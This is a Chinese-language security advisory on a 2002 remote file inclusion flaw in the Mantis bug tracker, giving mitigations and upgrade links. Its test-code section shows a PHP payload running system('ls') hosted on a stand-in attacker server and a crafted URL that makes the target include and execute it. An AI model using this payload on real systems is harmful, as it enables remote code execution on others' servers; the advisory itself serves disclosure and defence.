Mantis JPGraph存在远程文件命令执行漏洞发布时间:2002-08-28 更新时间:2002-08-28 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:5504 受影响系统 Mantis Mantis 0.15.3详细描述 Mantis是基于WEB的BUG跟踪系统。 Mantis根据包含的文件来提供部分功能,如动态生成图片,但是Mantis对包含的合法路径缺少正确的检查,可导致攻击这指定任意路径,如本地系统的文件名或者远程服务器上的文件名,而导致执行文件中的任意代码。 测试代码 在自己控制的服务器上建立包含如下代码的listings.txt: <?php system('ls'); exit; ?> 再执行如下URL: http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F 解决方案 在PHP配置中设置'allow_url_fopen'和'register_globals'选项为'off'。 或者在summary_graph_functions.php顶部插入: if ( isset($HTTP_GET_VARS['g_jpgraph_path']) || isset($HTTP_POST_VARS['g_jpgraph_path']) || isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) { exit; }: 升级程序: Mantis Mantis 0.15.3: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.4: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.5: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.6: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.7: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.8: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.9: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.10: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.11: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.15.12: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.16 .0: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.16.1: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.17 .0: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.17.1: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.17.2: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 Mantis Mantis 0.17.3: Mantis Upgrade Mantis 0.17.4a http://sourceforge.net/project/showfiles.php?group_id=14963 相关信息 Joao Gouveia <tharbad@kaotik.org>. 参考:http://online.securityfocus.com/archive/1/288116 相关主页:http://mantisbt.sourceforge.net/index.php3 |
